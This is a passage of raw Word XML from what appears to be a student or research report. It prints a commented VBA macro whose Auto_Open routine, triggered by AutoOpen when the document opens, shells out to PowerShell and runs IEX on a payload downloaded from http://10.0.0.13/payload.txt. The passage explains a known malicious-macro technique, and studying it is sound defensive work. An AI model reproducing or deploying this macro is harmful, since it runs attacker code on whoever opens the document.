        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Auto_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00784877" w:rsidR="00504046" w:rsidP="00504046" w:rsidRDefault="00504046" w14:paraId="08327F1A" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>//Create string object called exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA5D59" w:rsidP="009E5AB7" w:rsidRDefault="00BA5D59" w14:paraId="43561731" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF21BF" w:rsidP="009E5AB7" w:rsidRDefault="00FF21BF" w14:paraId="0AB75BD1" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E56717"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Dim</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> exec As </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E56717"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA5D59" w:rsidP="004D51D5" w:rsidRDefault="00BA5D59" w14:paraId="0806793C" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00FB5FB2" w:rsidR="00FB5FB2" w:rsidP="004D51D5" w:rsidRDefault="00FB5FB2" w14:paraId="589D835B" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>//Initialize string variable with</w:t>
      </w:r>
      <w:r w:rsidR="004D51D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> command line path that can be executed in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D51D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BA5D59" w:rsidP="009E5AB7" w:rsidRDefault="00BA5D59" w14:paraId="078B8761" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF21BF" w:rsidP="009E5AB7" w:rsidRDefault="00F00C40" w14:paraId="0984F898" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">exec = </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"powershell.exe ""IEX ((new-object</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00C40">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>net.webclient</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>).downloadstring('http://10.0.0.13/payload.txt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>))”””</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA5D59" w:rsidP="009E5AB7" w:rsidRDefault="00BA5D59" w14:paraId="26DC8CC6" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00122E21" w:rsidR="004D51D5" w:rsidP="009E5AB7" w:rsidRDefault="00122E21" w14:paraId="52E6DB9E" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>//Use the macro shell, like a command terminal, to execute the path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA5D59" w:rsidP="009E5AB7" w:rsidRDefault="00BA5D59" w14:paraId="13DAD480" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00544D95" w:rsidP="009E5AB7" w:rsidRDefault="00F00C40" w14:paraId="6A327FE9" w14:textId="7611619E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Shell (exec)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF21BF" w:rsidR="00713D15">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00C40" w:rsidP="006258FF" w:rsidRDefault="00713D15" w14:paraId="16EC8D92" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA5D59" w:rsidP="006258FF" w:rsidRDefault="00BA5D59" w14:paraId="03AC6C0C" w14:textId="0432DC0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00784877" w:rsidR="009E5AB7" w:rsidP="006258FF" w:rsidRDefault="00784877" w14:paraId="04E7186E" w14:textId="4D16EDC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">//On Open </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Word Document</w:t>
      </w:r>
      <w:r w:rsidR="00223171">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> run the auto open method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00544D95" w:rsidP="006258FF" w:rsidRDefault="00544D95" w14:paraId="1CA039FE" w14:textId="7A009F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00544D95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>AutoOpen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00544D95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00B328C5" w:rsidR="00B328C5" w:rsidP="006258FF" w:rsidRDefault="00B328C5" w14:paraId="78A15062" w14:textId="3CE6F074">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">//Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>auto_open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00544D95" w:rsidP="009E5AB7" w:rsidRDefault="00544D95" w14:paraId="737C57BC" w14:textId="043EB884">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF21BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Auto_Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00544D95" w:rsidP="00544D95" w:rsidRDefault="00544D95" w14:paraId="28646EFE" w14:textId="7A49D069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8D38C9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>End Sub</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="8D38C9"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:id w:val="718395454"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009C3028">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="8D38C9"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009C3028">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="8D38C9"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Cod16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="009C3028">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="8D38C9"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="8D38C9"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
              <w:noProof/>
              <w:color w:val="8D38C9"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r w:rsidR="009C3028">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Times New Roman" w:cs="Consolas"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="8D38C9"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00AB752E" w:rsidP="00AB752E" w:rsidRDefault="00AB752E" w14:paraId="1C4FBF06" w14:textId="1CB2691A">
      <w:pPr>
